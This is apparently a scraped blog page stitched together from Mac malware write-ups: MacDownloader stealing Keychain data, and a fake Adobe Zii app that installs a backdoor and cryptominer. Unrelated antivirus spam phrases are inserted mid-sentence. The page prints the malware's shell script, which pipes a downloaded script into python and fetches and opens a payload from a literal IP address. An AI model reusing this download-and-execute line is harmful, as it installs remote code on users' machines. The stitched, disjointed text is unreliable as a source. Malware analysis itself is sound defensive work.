Image: Intego Click to “remove” the adware, and you’ll be prompted to enter your admin password. Once MacDownloader has your password it tries to establish a connection to a remote server so that it can transmit data. In our search for adware and Mac OS malware, we found lots of new adware applications for Mac OS in 2016, 2017 and recently 2018. For what we have seen at the end of 2017 and mid/end 2018 is that Mac OS malware is emerging to social engineering. What kind of data? The contents of your Keychain: usernames, passwords, PINs, credit card numbers whatever private information a Mac user has stored in it. Fortunately, MacDownloader doesn’t appear to pose a major risk to Mac users at the moment. The remote server it tries to connect to has been taken offline, so there’s nothing controlling its activities at the moment. It’s quite likely, however, that its authors will fix the flaws that security researchers discovered in its code (and poorly-written dialogues) and release an updated version. How To Protect Yourself Instead of trusting a mysterious pop-up window that appears on your Mac, here’s how you should check to see if your Flash player needs an update. Press command and space bar to bring up Spotlight, then type in “Flash Player” and click on the system preference for it. Click on the “Updates” tab, and then click “check now.” I’ve reached out to both Adobe and Apple for comments on MacDownloader and will update this post with their responses. Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil. The malware was being distributed through an application named Adobe Zii. Adobe Zii is software that is designed to aid in the piracy of a variety of Adobe applications. In this case, however, the app was called Adobe Zii, but it was definitely not the real thing. As can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative Cloud logo. Best antivirus for mac lion. (After all, if you’re going to write software to help people steal Adobe software, why not steal the logo, too?) The malware installer, however, uses a generic Automator applet icon. Behavior Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script: curl| python - & s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; cd sample; cd __MACOSX; open -a sample.app This script is designed to download and execute a Python script, then download and run an app named sample.app. The sample.app is simple. It appears to simply be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually “legitimate.” (This is not to imply that software piracy is legitimate, of course, but rather it means that the malware was attempting to look like it was doing what the user thought it was intended to do.) What about the Python script? Sophos antivirus for mac issues found. • Open the 'ESCOSX' folder in your Downloads.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
March 2019
Categories |